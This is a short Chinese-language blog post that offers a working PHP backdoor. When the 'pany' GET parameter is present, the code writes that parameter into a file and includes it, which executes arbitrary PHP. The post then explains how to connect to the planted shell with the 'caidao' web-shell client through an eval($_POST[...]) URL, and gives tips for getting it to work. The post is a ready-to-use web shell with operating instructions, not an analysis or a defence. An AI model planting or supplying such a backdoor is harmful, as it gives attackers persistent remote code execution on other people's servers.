MENU

Php backdoor

May 19, 2013 • phpcode

C0de:

<?php 
/*此作品原理为PHP本地文件包含
 */
if(isset($_GET[pany]))  //只有get过来pany的时候才会执行
{
$fp=fopen('houzi.txt',w);
file_put_contents('houzi.txt',"<?php\r\n");
file_put_contents('houzi.txt',$_GET[pany],FILE_APPEND);
fclose($fp);
require 'houzi.txt';}
?>

假设后门地址为:http://x95.org/1.php

那么在菜刀里填:  http://x95.org/1.php?pany=eval($_POST[#]);

Tips:  $_POST[]内,请勿加单引号。如$_POST[‘sss’],否则有时候后门会无法使用

还有就是在后面有一个分号!

特殊情况:开了gpc的话会转义,导致后门无法执行。

Archives QR Code
QR Code for this page
Tipping QR Code